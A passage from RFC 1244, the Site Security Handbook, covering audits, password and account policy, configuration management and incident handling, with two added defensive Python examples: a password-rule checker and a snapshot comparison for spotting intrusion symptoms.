internationally). The software posted to the following
USENET source newsgroups is stored here, in directories of
the same name:

comp.sources.games
comp.sources.misc
comp.sources.sun
comp.sources.unix
comp.sources.x

Numerous other distributions, such as all the freely
distributable Berkeley UNIX source code, Internet Request
for Comments (RFCs), and so on are also stored on this
system.

3.9.9.4.4 Vendors

Many vendors make fixes for bugs in their software available
electronically, either via mailing lists or via anonymous
FTP. You should contact your vendor to find out if they
offer this service, and if so, how to access it. Some
vendors that offer these services include Sun Microsystems
(see above), Digital Equipment Corporation (DEC), the
University of California at Berkeley (see above), and Apple
Computer [5, CURRY].

4. Types of Security Procedures

4.1 System Security Audits

Most businesses undergo some sort of annual financial auditing as a
regular part of their business life. Security audits are an
important part of running any computing environment. Part of the
security audit should be a review of any policies that concern system
security, as well as the mechanisms that are put in place to enforce
them.

4.1.1 Organize Scheduled Drills

Although not something that would be done each day or week,
scheduled drills may be conducted to determine if the procedures
defined are adequate for the threat to be countered. If your
major threat is one of natural disaster, then a drill would be
conducted to verify your backup and recovery mechanisms. On the
other hand, if your greatest threat is from external intruders
attempting to penetrate your system, a drill might be conducted to
actually try a penetration to observe the effect of the policies.

Drills are a valuable way to test that your policies and
procedures are effective. On the other hand, drills can be time-
consuming and disruptive to normal operations. It is important to
weigh the benefits of the drills against the possible time loss
which may be associated with them.

4.1.2 Test Procedures

If the choice is made not to use scheduled drills to examine
your entire security procedure at one time, it is important to
test individual procedures frequently. Examine your backup
procedure to make sure you can recover data from the tapes. Check
log files to be sure that information which is supposed to be
logged to them is being logged to them, etc..

When a security audit is mandated, great care should be used in
devising tests of the security policy. It is important to clearly
identify what is being tested, how the test will be conducted, and
results expected from the test. This should all be documented and
included in or as an adjunct to the security policy document
itself.

It is important to test all aspects of the security policy, both
procedural and automated, with a particular emphasis on the
automated mechanisms used to enforce the policy. Tests should be
defined to ensure a comprehensive examination of policy features,
that is, if a test is defined to examine the user logon process,
it should be explicitly stated that both valid and invalid user
names and passwords will be used to demonstrate proper operation
of the logon program.

Keep in mind that there is a limit to the reasonableness of tests.
The purpose of testing is to ensure confidence that the security
policy is being correctly enforced, and not to “prove” the
absoluteness of the system or policy. The goal should be to
obtain some assurance that the reasonable and credible controls
imposed by your security policy are adequate.

4.2 Account Management Procedures

Procedures to manage accounts are important in preventing
unauthorized access to your system. It is necessary to decide
several things: Who may have an account on the system? How long may
someone have an account without renewing his or her request? How do
old accounts get removed from the system? The answers to all these
questions should be explicitly set out in the policy.

In addition to deciding who may use a system, it may be important to
determine what each user may use the system for (is personal use
allowed, for example). If you are connected to an outside network,
your site or the network management may have rules about what the
network may be used for. Therefore, it is important for any security
policy to define an adequate account management procedure for both
administrators and users. Typically, the system administrator would
be responsible for creating and deleting user accounts and generally
maintaining overall control of system use. To some degree, account
management is also the responsibility of each system user in the
sense that the user should observe any system messages and events
that may be indicative of a policy violation. For example, a message
at logon that indicates the date and time of the last logon should be
reported by the user if it indicates an unreasonable time of last
logon.

4.3 Password Management Procedures

A policy on password management may be important if your site wishes
to enforce secure passwords. These procedures may range from asking
or forcing users to change their passwords occasionally to actively
attempting to break users’ passwords and then informing the user of
how easy it was to do. Another part of password management policy
covers who may distribute passwords – can users give their passwords
to other users?

Section 2.3 discusses some of the policy issues that need to be
decided for proper password management. Regardless of the policies,
password management procedures need to be carefully set up to avoid
disclosing passwords. The choice of initial passwords for accounts
is critical. In some cases, users may never login to activate an
account; thus, the choice of the initial password should not be
easily guessed. Default passwords should never be assigned to
accounts: always create new passwords for each user. If there are
any printed lists of passwords, these should be kept off-line in
secure locations; better yet, don’t list passwords.

4.3.1 Password Selection

Perhaps the most vulnerable part of any computer system is the
account password. Any computer system, no matter how secure it is
from network or dial-up attack, Trojan horse programs, and so on,
can be fully exploited by an intruder if he or she can gain access
via a poorly chosen password. It is important to define a good
set of rules for password selection, and distribute these rules to
all users. If possible, the software which sets user passwords
should be modified to enforce as many of the rules as possible.

A sample set of guidelines for password selection is shown below:

– DON’T use your login name in any form (as-is,
reversed, capitalized, doubled, etc.).

– DON’T use your first, middle, or last name in any form.

– DON’T use your spouse’s or child’s name.

– DON’T use other information easily obtained about you.
This includes license plate numbers, telephone numbers,
social security numbers, the make of your automobile,
the name of the street you live on, etc.

– DON’T use a password of all digits, or all the same
letter.

– DON’T use a word contained in English or foreign
language dictionaries, spelling lists, or other
lists of words.

– DON’T use a password shorter than six characters.

– DO use a password with mixed-case alphabetics.

– DO use a password with non-alphabetic characters (digits
or punctuation).

– DO use a password that is easy to remember, so you don’t
have to write it down.

– DO use a password that you can type quickly, without
having to look at the keyboard.
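
The handbook suggests that password-setting software enforce as many of these rules as possible. The following checker is an added example, not part of RFC 1244; the rule identifiers, the function names and the tiny SAMPLE_WORDS list (a stand-in for a real dictionary) are assumptions, and the two "easy to remember" and "type quickly" guidelines are left out because software cannot judge them.

```python
# Added example: checks a candidate password against the machine-checkable
# guidelines listed above. Rule identifiers and SAMPLE_WORDS are constructed
# for illustration; a site would load real dictionaries and spelling lists.

SAMPLE_WORDS = {"password", "secret", "dragon", "wizard", "summer", "bonjour"}


def _norm(text):
    """Lower-case and drop separators so '555-1234' matches '5551234'."""
    return "".join(c for c in text.lower() if c.isalnum())


def _hits(password, tokens):
    """True if any token, or its reversal, appears inside the password.

    Capitalized and doubled forms are caught by the case-folded substring
    test. Tokens under three characters are skipped to avoid false hits.
    """
    pw = _norm(password)
    for token in tokens:
        t = _norm(token)
        if len(t) >= 3 and (t in pw or t[::-1] in pw):
            return True
    return False


def check_password(password, login, names=(), personal=(), words=SAMPLE_WORDS):
    """Return the list of violated guidelines; an empty list means accepted."""
    problems = []
    if _hits(password, [login]):
        problems.append("login-name")
    if _hits(password, names):            # first, middle, last, spouse, child
        problems.append("personal-name")
    if _hits(password, personal):         # plate, phone, street, car make ...
        problems.append("personal-info")
    if password.isdigit():
        problems.append("all-digits")
    if len(password) > 1 and len(set(password.lower())) == 1:
        problems.append("single-repeated-character")
    if password.lower() in words:
        problems.append("dictionary-word")
    if len(password) < 6:
        problems.append("shorter-than-six")
    has_lower = any(c.islower() for c in password)
    has_upper = any(c.isupper() for c in password)
    if not (has_lower and has_upper):
        problems.append("no-mixed-case")
    if not any(not c.isalpha() for c in password):
        problems.append("no-non-alphabetic")
    return problems


if __name__ == "__main__":
    # Constructed candidates for a hypothetical user "jsmith".
    for candidate in ("jsmith", "Htimsj99!", "Secret", "Tb!oN2tb"):
        print(candidate, check_password(candidate, "jsmith",
                                        names=("John", "Smith")))
```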

Methods of selecting a password which adheres to these guidelines
include:

– Choose a line or two from a song or poem, and use the
first letter of each word.

– Alternate between one consonant and one or two vowels, up
to seven or eight characters. This provides nonsense
words which are usually pronounceable, and thus easily
remembered.

– Choose two short words and concatenate them together with
a punctuation character between them.

Users should also be told to change their password periodically,
usually every three to six months. This makes sure that an
intruder who has guessed a password will eventually lose access,
as well as invalidating any list of passwords he/she may have
obtained. Many systems enable the system administrator to force
users to change their passwords after an expiration period; this
software should be enabled if your system supports it [5, CURRY].

Some systems provide software which forces users to change their
passwords on a regular basis. Many of these systems also include
password generators which provide the user with a set of passwords
to choose from. The user is not permitted to make up his or her
own password. There are arguments both for and against systems
such as these. On the one hand, by using generated passwords,
users are prevented from selecting insecure passwords. On the
other hand, unless the generator is good at making up easy to
remember passwords, users will begin writing them down in order to
remember them.

4.3.2 Procedures for Changing Passwords

How password changes are handled is important to keeping passwords
secure. Ideally, users should be able to change their own
passwords on-line. (Note that password changing programs are a
favorite target of intruders. See section 4.4 on configuration
management for further information.)

However, there are exception cases which must be handled
carefully. Users may forget passwords and not be able to get onto
the system. The standard procedure is to assign the user a new
password. Care should be taken to make sure that the real person
is requesting the change and gets the new password. One common
trick used by intruders is to call or message a system
administrator and request a new password. Some external form of
verification should be used before the password is assigned. At
some sites, users are required to show up in person with ID.

There may also be times when many passwords need to be changed.
If a system is compromised by an intruder, the intruder may be
able to steal a password file and take it off the system. Under
these circumstances, one course of action is to change all
passwords on the system. Your site should have procedures for how
this can be done quickly and efficiently. What course you choose
may depend on the urgency of the problem. In the case of a known
attack with damage, you may choose to forcibly disable all
accounts and assign users new passwords before they come back onto
the system. In some places, users are sent a message telling them
that they should change their passwords, perhaps within a certain
time period. If the password isn’t changed before the time period
expires, the account is locked.

Users should be aware of what the standard procedure is for
passwords when a security event has occurred. One well-known
spoof reported by the Computer Emergency Response Team (CERT)
involved messages sent to users, supposedly from local system
administrators, requesting them to immediately change their
password to a new value provided in the message [24]. These
messages were not from the administrators, but from intruders
trying to steal accounts. Users should be warned to immediately
report any suspicious requests such as this to site
administrators.

4.4 Configuration Management Procedures

Configuration management is generally applied to the software
development process. However, it is certainly applicable in an
operational sense as well. Consider that since many of the
system level programs are intended to enforce the security policy, it
is important that these be “known” as correct. That is, one should
not allow system level programs (such as the operating system, etc.)
to be changed arbitrarily. At the very least, the procedures should
state who is authorized to make changes to systems, under what
circumstances, and how the changes should be documented.

In some environments, configuration management is also desirable as
applied to physical configuration of equipment. Maintaining valid
and authorized hardware configuration should be given due
consideration in your security policy.

4.4.1 Non-Standard Configurations

Occasionally, it may be beneficial to have a slightly non-standard
configuration in order to thwart the “standard” attacks used by
some intruders. The non-standard parts of the configuration might
include different password encryption algorithms, different
configuration file locations, and rewritten or functionally
limited system commands.

Non-standard configurations, however, also have their drawbacks.
By changing the “standard” system, these modifications make
software maintenance more difficult by requiring extra
documentation to be written, software modification after operating
system upgrades, and, usually, someone with special knowledge of
the changes.

Because of the drawbacks of non-standard configurations, they are
often only used in environments with a “firewall” machine (see
section 3.9.1). The firewall machine is modified in non-standard
ways since it is susceptible to attack, while internal systems
behind the firewall are left in their standard configurations.

5. Incident Handling

5.1 Overview

This section of the document will supply some guidance to be applied
when a computer security event is in progress on a machine, network,
site, or multi-site environment. The operative philosophy in the
event of a breach of computer security, whether it be an external
intruder attack or a disgruntled employee, is to plan for adverse
events in advance. There is no substitute for creating contingency
plans for the types of events described above.

Traditional computer security, while quite important in the overall
site security plan, usually falls heavily on protecting systems from
attack, and perhaps monitoring systems to detect attacks. Little
attention is usually paid to how to actually handle the attack when
it occurs. The result is that when an attack is in progress, many
decisions are made in haste and can be damaging to tracking down the
source of the incident, collecting evidence to be used in prosecution
efforts, preparing for the recovery of the system, and protecting the
valuable data contained on the system.

5.1.1 Have a Plan to Follow in Case of an Incident

Part of handling an incident is being prepared to respond before
the incident occurs. This includes establishing a suitable level
of protections, so that if the incident becomes severe, the damage
which can occur is limited. Protection includes preparing
incident handling guidelines or a contingency response plan for
your organization or site. Having written plans eliminates much
of the ambiguity which occurs during an incident, and will lead to
a more appropriate and thorough set of responses. Second, part of
protection is preparing a method of notification, so you will know
who to call and the relevant phone numbers. It is important, for
example, to conduct “dry runs,” in which your computer security
personnel, system administrators, and managers simulate handling
an incident.

Learning to respond efficiently to an incident is important for
numerous reasons. The most important benefit is directly to human
beings–preventing loss of human life. Some computing systems are
life critical systems, systems on which human life depends (e.g.,
by controlling some aspect of life-support in a hospital or
assisting air traffic controllers).

An important but often overlooked benefit is an economic one.
Having both technical and managerial personnel respond to an
incident requires considerable resources, resources which could be
utilized more profitably if an incident did not require their
services. If these personnel are trained to handle an incident
efficiently, less of their time is required to deal with that
incident.

A third benefit is protecting classified, sensitive, or
proprietary information. One of the major dangers of a computer
security incident is that information may be irrecoverable.
Efficient incident handling minimizes this danger. When
classified information is involved, other government regulations
may apply and must be integrated into any plan for incident
handling.

A fourth benefit is related to public relations. News about
computer security incidents tends to be damaging to an
organization’s stature among current or potential clients.
Efficient incident handling minimizes the potential for negative
exposure.

A final benefit of efficient incident handling is related to legal
issues. It is possible that in the near future organizations may
be sued because one of their nodes was used to launch a network
attack. In a similar vein, people who develop patches or
workarounds may be sued if the patches or workarounds are
ineffective, resulting in damage to systems, or if the patches or
workarounds themselves damage systems. Knowing about operating
system vulnerabilities and patterns of attacks and then taking
appropriate measures is critical to circumventing possible legal
problems.

5.1.2 Order of Discussion in this Session Suggests an Order for
a Plan

This chapter is arranged such that a list may be generated from
the Table of Contents to provide a starting point for creating a
policy for handling ongoing incidents. The main points to be
included in a policy for handling incidents are:

o Overview (what are the goals and objectives in handling the
incident).
o Evaluation (how serious is the incident).
o Notification (who should be notified about the incident).
o Response (what should the response to the incident be).
o Legal/Investigative (what are the legal and prosecutorial
implications of the incident).
o Documentation Logs (what records should be kept from before,
during, and after the incident).

Each of these points is important in an overall plan for handling
incidents. The remainder of this chapter will detail the issues
involved in each of these topics, and provide some guidance as to
what should be included in a site policy for handling incidents.

5.1.3 Possible Goals and Incentives for Efficient Incident
Handling

As in any set of pre-planned procedures, attention must be placed
on a set of goals to be obtained in handling an incident. These
goals will be placed in order of importance depending on the site,
but one such set of goals might be:

Assure integrity of (life) critical systems.
Maintain and restore data.
Maintain and restore service.
Figure out how it happened.
Avoid escalation and further incidents.
Avoid negative publicity.
Find out who did it.
Punish the attackers.

It is important to prioritize actions to be taken during an
incident well in advance of the time an incident occurs.
Sometimes an incident may be so complex that it is impossible to
do everything at once to respond to it; priorities are essential.
Although priorities will vary from institution-to-institution, the
following suggested priorities serve as a starting point for
defining an organization’s response:

o Priority one — protect human life and people’s
safety; human life always has precedence over all
other considerations.

o Priority two — protect classified and/or sensitive
data (as regulated by your site or by government
regulations).

o Priority three — protect other data, including
proprietary, scientific, managerial and other data,
because loss of data is costly in terms of resources.

o Priority four — prevent damage to systems (e.g., loss
or alteration of system files, damage to disk drives,
etc.); damage to systems can result in costly down
time and recovery.

o Priority five — minimize disruption of computing
resources; it is better in many cases to shut a system
down or disconnect from a network than to risk damage
to data or systems.

An important implication for defining priorities is that once
human life and national security considerations have been
addressed, it is generally more important to save data than system
software and hardware. Although it is undesirable to have any
damage or loss during an incident, systems can be replaced; the
loss or compromise of data (especially classified data), however,
is usually not an acceptable outcome under any circumstances.

Part of handling an incident is being prepared to respond before
the incident occurs. This includes establishing a suitable level
of protections so that if the incident becomes severe, the damage
which can occur is limited. Protection includes preparing
incident handling guidelines or a contingency response plan for
your organization or site. Written plans eliminate much of the
ambiguity which occurs during an incident, and will lead to a more
appropriate and thorough set of responses. Second, part of
protection is preparing a method of notification so you will know
who to call and how to contact them. For example, every member of
the Department of Energy’s CIAC Team carries a card with every
other team member’s work and home phone numbers, as well as pager
numbers. Third, your organization or site should establish backup
procedures for every machine and system. Having backups
eliminates much of the threat of even a severe incident, since
backups preclude serious data loss. Fourth, you should set up
secure systems. This involves eliminating vulnerabilities,
establishing an effective password policy, and other procedures,
all of which will be explained later in this document. Finally,
conducting training activities is part of protection. It is
important, for example, to conduct “dry runs,” in which your
computer security personnel, system administrators, and managers
simulate handling an incident.

5.1.4 Local Policies and Regulations Providing Guidance

Any plan for responding to security incidents should be guided by
local policies and regulations. Government and private sites that
deal with classified material have specific rules that they must
follow.

The policies your site makes about how it responds to incidents
(as discussed in sections 2.4 and 2.5) will shape your response.
For example, it may make little sense to create mechanisms to
monitor and trace intruders if your site does not plan to take
action against the intruders if they are caught. Other
organizations may have policies that affect your plans. Telephone
companies often release information about telephone traces only to
law enforcement agencies.

Section 5.5 also notes that if any legal action is planned, there
are specific guidelines that must be followed to make sure that
any information collected can be used as evidence.

5.2 Evaluation

5.2.1 Is It Real?

This stage involves determining the exact problem. Of course
many, if not most, signs often associated with virus infections,
system intrusions, etc., are simply anomalies such as hardware
failures. To assist in identifying whether there really is an
incident, it is usually helpful to obtain and use any detection
software which may be available. For example, widely available
software packages can greatly assist someone who thinks there may
be a virus in a Macintosh computer. Audit information is also
extremely useful, especially in determining whether there is a
network attack. It is extremely important to obtain a system
snapshot as soon as one suspects that something is wrong. Many
incidents cause a dynamic chain of events to occur, and an initial
system snapshot may do more good in identifying the problem and
any source of attack than most other actions which can be taken at
this stage. Finally, it is important to start a log book.
Recording system events, telephone conversations, time stamps,
etc., can lead to a more rapid and systematic identification of
the problem, and is the basis for subsequent stages of incident
handling.

There are certain indications or “symptoms” of an incident which
deserve special attention:

o System crashes.
o New user accounts (e.g., the account RUMPLESTILTSKIN
has unexplainedly been created), or high activity on
an account that has had virtually no activity for
months.
o New files (usually with novel or strange file names,
such as data.xx or k).
o Accounting discrepancies (e.g., in a UNIX system you
might notice that the accounting file called
/usr/admin/lastlog has shrunk, something that should
make you very suspicious that there may be an
intruder).
o Changes in file lengths or dates (e.g., a user should
be suspicious if he/she observes that the .EXE files in
an MS DOS computer have unexplainedly grown
by over 1800 bytes).
o Attempts to write to system (e.g., a system manager
notices that a privileged user in a VMS system is
attempting to alter RIGHTSLIST.DAT).
o Data modification or deletion (e.g., files start to
disappear).
o Denial of service (e.g., a system manager and all
other users become locked out of a UNIX system, which
has been changed to single user mode).
o Unexplained, poor system performance (e.g., system
response time becomes unusually slow).
o Anomalies (e.g., “GOTCHA” is displayed on a display
terminal or there are frequent unexplained “beeps”).
o Suspicious probes (e.g., there are numerous
unsuccessful login attempts from another node).
o Suspicious browsing (e.g., someone becomes a root user
on a UNIX system and accesses file after file in one
user’s account, then another’s).

None of these indications is absolute “proof” that an incident is
occurring, nor are all of these indications normally observed when
an incident occurs. If you observe any of these indications,
however, it is important to suspect that an incident might be
occurring, and act accordingly. There is no formula for
determining with 100 percent accuracy that an incident is
occurring (possible exception: when a virus detection package
indicates that your machine has the nVIR virus and you confirm
this by examining contents of the nVIR resource in your Macintosh
computer, you can be very certain that your machine is infected).
It is best at this point to collaborate with other technical and
computer security personnel to make a decision as a group about
whether an incident is occurring.
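
The system snapshot advice and several of the symptoms listed above (new accounts, new files, changed file lengths or dates, a shrinking accounting file, disappearing files) can be checked mechanically by comparing a baseline with a later snapshot. The following is an added example, not part of RFC 1244; the function names, the finding labels and the use of SHA-256 alongside length and date are assumptions made here.

```python
# Added example: take a snapshot of a directory tree and a passwd-format
# account file, then compare two snapshots for the symptoms listed above.
# Finding labels and the SHA-256 content check are choices made for this
# example, not something the handbook prescribes.
import hashlib
import os


def snapshot(root, passwd_path):
    """Record (size, mtime, sha256) per regular file under root, plus the
    account names in a passwd-format file (name is the first ':' field)."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue  # only regular files are hashed
            st = os.stat(path)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(path, root)
            files[rel] = (st.st_size, int(st.st_mtime), digest)
    accounts = set()
    with open(passwd_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            line = line.strip()
            if line and not line.startswith("#"):
                accounts.add(line.split(":", 1)[0])
    return {"files": files, "accounts": accounts}


def compare(before, after, append_only=()):
    """Return (kind, subject, detail) findings between two snapshots.

    append_only names files, such as accounting logs, that should only
    ever grow; a smaller size there is reported as 'log-shrunk'.
    """
    findings = []
    for account in sorted(after["accounts"] - before["accounts"]):
        findings.append(("new-account", account, "not in baseline"))
    old, new = before["files"], after["files"]
    for path in sorted(new.keys() - old.keys()):
        findings.append(("new-file", path, "%d bytes" % new[path][0]))
    for path in sorted(old.keys() - new.keys()):
        findings.append(("deleted-file", path, "was %d bytes" % old[path][0]))
    for path in sorted(old.keys() & new.keys()):
        (osize, omtime, ohash), (nsize, nmtime, nhash) = old[path], new[path]
        if path in append_only and nsize < osize:
            findings.append(("log-shrunk", path,
                             "%d -> %d bytes" % (osize, nsize)))
        elif ohash != nhash:
            findings.append(("content-changed", path,
                             "%+d bytes" % (nsize - osize)))
        elif omtime != nmtime:
            findings.append(("date-changed", path,
                             "same content, new timestamp"))
    return findings
```

As the handbook says of the symptoms themselves, a finding is a reason to investigate rather than proof of an incident. Store the baseline where the suspected host cannot modify it.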

5.2.2 Scope

Along with the identification of the incident is the evaluation of
the scope and impact of the problem. It is important to correctly
identify the boundaries of the incident in order to effectively
deal with it. In addition, the impact of an incident will
determine its priority in allocating resources to deal with the
event. Without an indication of the scope and impact of the
event, it is difficult to determine a correct response.

In order to identify the scope and impact, a set of criteria
should be defined which is appropriate to the site and to the type
of connections available. Some of the issues are:

o Is this a multi-site incident?
o Are many computers at your site affected by this
incident?
o Is sensitive information involved?
o What is the entry point of the incident (network,
phone line, local terminal, etc.)?
o Is the press involved?
o What is the potential damage of the incident?
o What is the estimated time to close out the incident?
o What resources could be required
to handle the incident?

5.3 Possible Types of Notification

When you have confirmed that an incident is occurring, the
appropriate personnel must be notified. Who is notified and how this
notification is achieved are very important in keeping the event under
control both from a technical and emotional standpoint.

5.3.1 Explicit

First of all, any notification to either local or off-site
personnel must be explicit. This requires that any statement (be
it an electronic mail message, phone call, or fax) provides
information about the incident that is clear, concise, and fully
qualified. When you are notifying others that will help you to
handle an event, a “smoke screen” will only divide the effort and
create confusion. If a division of labor is suggested, it is
helpful to provide information to each section about what is being
accomplished in other efforts. This will not only reduce
duplication of effort, but allow people working on parts of the
problem to know where to obtain other information that would help
them resolve a part of the incident.

5.3.2 Factual

Another important consideration when communicating about the
incident is to be factual. Attempting to hide aspects of the
incident by providing false or incomplete information may not only
prevent a successful resolution to the incident, but may even
worsen the situation. This is especially true when the press is
involved. When an incident severe enough to gain press attention
is ongoing, it is likely that any false information you provide
will not be substantiated by other sources. This will reflect
badly on the site and may create enough ill-will between the site
and the press to damage the site’s public relations.

5.3.3 Choice of Language

The choice of language used when notifying people about the
incident can have a profound effect on the way that information is
received. When you use emotional or inflammatory terms, you raise
the expectations of damage and negative outcomes of the incident.
It is important to remain calm both in written and spoken
notifications.

Another issue associated with the choice of language is the
notification to non-technical or off-site personnel. It is
important to accurately describe the incident without undue alarm
or confusing messages. While it is more difficult to describe the
incident to a non-technical audience, it is often more important.
A non-technical description may be required for upper-level
management, the press, or law enforcement liaisons. The
importance of these notifications cannot be underestimated and may
make the difference between handling the incident properly and
escalating to some higher level of damage.

5.3.4 Notification of Individuals

o Point of Contact (POC) people (Technical, Administrative,
Response Teams, Investigative, Legal, Vendors, Service
providers), and which POCs are visible to whom.
o Wider community (users).
o Other sites that might be affected.

Finally, there is the question of who should be notified during
and after the incident. There are several classes of individuals
that need to be considered for notification. These are the
technical personnel, administration, appropriate response teams
(such as CERT or CIAC), law enforcement, vendors, and other
service providers. These issues are important for the central
point of contact, since that is the person responsible for the
actual notification of others (see section 5.3.6 for further
information). A list of people in each of these categories is an
important time saver for the POC during an incident. It is much
more difficult to find an appropriate person during an incident
when many urgent events are ongoing.

In addition to the people responsible for handling part of the
incident, there may be other sites affected by the incident (or
perhaps simply at risk from the incident). A wider community of
users may also benefit from knowledge of the incident. Often, a
report of the incident once it is closed out is appropriate for
publication to the wider user community.

5.3.5 Public Relations – Press Releases

One of the most important issues to consider is when, who, and how
much to release to the general public through the press. There
are many issues to consider when deciding this particular issue.
First and foremost, if a public relations office exists for the
site, it is important to use this office as liaison to the press.
The public relations office is trained in the type and wording of
information released, and will help to assure that the image of
the site is protected during and after the incident (if possible).
A public relations office has the advantage that you can
communicate candidly with them, and provide a buffer between the
constant press attention and the need of the POC to maintain
control over the incident.

If a public relations office is not available, the information
released to the press must be carefully considered. If the
information is sensitive, it may be advantageous to provide only
minimal or overview information to the press. It is quite
possible that any information provided to the press will be
quickly reviewed by the perpetrator of the incident. As a
contrast to this consideration, it was discussed above that
misleading the press can often backfire and cause more damage than
releasing sensitive information.

While it is difficult to determine in advance what level of detail
to provide to the press, some guidelines to keep in mind are:

o Keep the technical level of detail low. Detailed
information about the incident may provide enough
information for copy-cat events or even damage the
site’s ability to prosecute once the event is over.
o Keep the speculation out of press statements.
Speculation about who is causing the incident or about the
motives is very likely to be in error and may cause
an inflamed view of the incident.
o Work with law enforcement professionals to assure that
evidence is protected. If prosecution is involved,
assure that the evidence collected is not divulged to
the press.
o Try not to be forced into a press interview before you are
prepared. The popular press is famous for the “2am”
interview, where the hope is to catch the interviewee off
guard and obtain information otherwise not available.
o Do not allow the press attention to detract from the
handling of the event. Always remember that the successful
closure of an incident is of primary importance.

5.3.6 Who Needs to Get Involved?

There now exist a number of incident response teams (IRTs) such
as the CERT and the CIAC. (See sections 3.9.7.3.1 and 3.9.7.3.4.)
Teams exist for many major government agencies and large
corporations. If such a team is available for your site, the
notification of this team should be of primary importance during
the early stages of an incident. These teams are responsible for
coordinating computer security incidents over a range of sites and
larger entities. Even if the incident is believed to be contained
to a single site, it is possible that the information available
through a response team could help in closing out the incident.

In setting up a site policy for incident handling, it may be
desirable to create an incident handling team (IHT), much like
those teams that already exist, that will be responsible for
handling computer security incidents for the site (or
organization). If such a team is created, it is essential that
communication lines be opened between this team and other IHTs.
Once an incident is under way, it is difficult to open a trusted
dialogue with other IHTs if none has existed before.

5.4 Response

A major topic still untouched here is how to actually respond to an
event. The response to an event will fall into the general
categories of containment, eradication, recovery, and follow-up.

Containment

The purpose of containment is to limit the extent of an attack.
For example, it is important to limit the spread of a worm attack
on a network as quickly as possible. An essential part of
containment is decision making (i.e., determining whether to shut
a system down, to disconnect from a network, to monitor system or
network activity, to set traps, to disable functions such as
remote file transfer on a UNIX system, etc.). Sometimes this
decision is trivial; shut the system down if the system is
classified or sensitive, or if proprietary information is at risk!
In other cases, it is worthwhile to risk having some damage to the
system if keeping the system up might enable you to identify an
intruder.

The third stage, containment, should involve carrying out
predetermined procedures. Your organization or site should, for
example, define acceptable risks in dealing with an incident, and
should prescribe specific actions and strategies accordingly.
Finally, notification of cognizant authorities should occur during
this stage.

Eradication

Once an incident has been detected, it is important to first think
about containing the incident. Once the incident has been
contained, it is now time to eradicate the cause. Software may be
available to help you in this effort. For example, eradication
software is available to eliminate most viruses which infect small
systems. If any bogus files have been created, it is time to
delete them at this point. In the case of virus infections, it is
important to clean and reformat any disks containing infected
files. Finally, ensure that all backups are clean. Many systems
infected with viruses become periodically reinfected simply
because people do not systematically eradicate the virus from
backups.

Recovery

Once the cause of an incident has been eradicated, the recovery
phase defines the next stage of action. The goal of recovery is
to return the system to normal. In the case of a network-based
attack, it is important to install patches for any operating
system vulnerability which was exploited.

Follow-up

One of the most important stages of responding to incidents is
also the most often omitted—the follow-up stage. This stage is
important because it helps those involved in handling the incident
develop a set of “lessons learned” (see section 6.3) to improve
future performance in such situations. This stage also provides
information which justifies an organization’s computer security
effort to management, and yields information which may be
essential in legal proceedings.

The most important element of the follow-up stage is performing a
postmortem analysis. Exactly what happened, and at what times?
How well did the staff involved with the incident perform? What
kind of information did the staff need quickly, and how could they
have gotten that information as soon as possible? What would the
staff do differently next time? A follow-up report is valuable
because it provides a reference to be used in case of other
similar incidents. Creating a formal chronology of events
(including time stamps) is also important for legal reasons.
Similarly, it is also important to obtain, as quickly as possible, a
monetary estimate of the amount of damage the incident caused in terms of
any loss of software and files, hardware damage, and manpower
costs to restore altered files, reconfigure affected systems, and
so forth. This estimate may become the basis for subsequent
prosecution activity by the FBI, the U.S. Attorney General’s
Office, etc.

5.4.1 What Will You Do?

o Restore control.
o Relation to policy.
o Which level of service is needed?
o Monitor activity.
o Constrain or shut down system.

5.4.2 Consider Designating a “Single Point of Contact”

When an incident is under way, a major issue is deciding who is in
charge of coordinating the activity of the multitude of players.
A major mistake that can be made is to have a number of “points of
contact” (POC) that are not pulling their efforts together. This
will only add to the confusion of the event, and will probably
lead to additional confusion and wasted or ineffective effort.

The single point of contact may or may not be the person “in
charge” of the incident. There are two distinct roles to fill
when deciding who shall be the point of contact and the person in
charge of the incident. The person in charge will make decisions
as to the interpretation of policy applied to the event. The
responsibility for the handling of the event falls onto this
person. In contrast, the point of contact must coordinate the
effort of all the parties involved with handling the event.

The point of contact must be a person with the technical expertise
to successfully coordinate the effort of the system managers and
users involved in monitoring and reacting to the attack. Often
the management structure of a site is such that the administrator
of a set of resources is not a technically competent person with
regard to handling the details of the operations of the computers,
but is ultimately responsible for the use of these resources.

Another important function of the POC is to maintain contact with
law enforcement and other external agencies (such as the CIA, DoD,
U.S. Army, or others) to assure that multi-agency involvement
occurs.

Finally, if legal action in the form of prosecution is involved,
the POC may be able to speak for the site in court. The
alternative is to have multiple witnesses that will be hard to
coordinate in a legal sense, and will weaken any case against the
attackers. A single POC may also be the single person in charge
of evidence collected, which will keep the number of people
accounting for evidence to a minimum. As a rule of thumb, the
more people that touch a potential piece of evidence, the greater
the possibility that it will be inadmissible in court. The
section below (Legal/Investigative) will provide more details for
consideration on this topic.

5.5 Legal/Investigative

5.5.1 Establishing Contacts with Investigative Agencies

It is important to establish contacts with personnel from
investigative agencies such as the FBI and Secret Service as soon
as possible, for several reasons. Local law enforcement and local
security offices or campus police organizations should also be
informed when appropriate. A primary reason is that once a major
attack is in progress, there is little time to call various
personnel in these agencies to determine exactly who the correct
point of contact is. Another reason is that it is important to
cooperate with these agencies in a manner that will foster a good
working relationship, and that will be in accordance with the
working procedures of these agencies. Knowing the working
procedures in advance and the expectations of your point of
contact is a big step in this direction. For example, it is
important to gather evidence that will be admissible in a court of
law. If you don’t know in advance how to gather admissible
evidence, your efforts to collect evidence during an incident are
likely to be of no value to the investigative agency with which
you deal. A final reason for establishing contacts as soon as
possible is that it is impossible to know the particular agency
that will assume jurisdiction in any given incident. Making
contacts and finding the proper channels early will make
responding to an incident go considerably more smoothly.

If your organization or site has a legal counsel, you need to
notify this office soon after you learn that an incident is in
progress. At a minimum, your legal counsel needs to be involved
to protect the legal and financial interests of your site or
organization. There are many legal and practical issues, a few of
which are:

1. Whether your site or organization is willing to risk
negative publicity or exposure to cooperate with legal
prosecution efforts.

2. Downstream liability–if you leave a compromised system
as is so it can be monitored and another computer is damaged
because the attack originated from your system, your site or
organization may be liable for damages incurred.

3. Distribution of information–if your site or organization
distributes information about an attack in which another
site or organization may be involved or the vulnerability
in a product that may affect ability to market that
product, your site or organization may again be liable
for any damages (including damage of reputation).

4. Liabilities due to monitoring–your site or organization
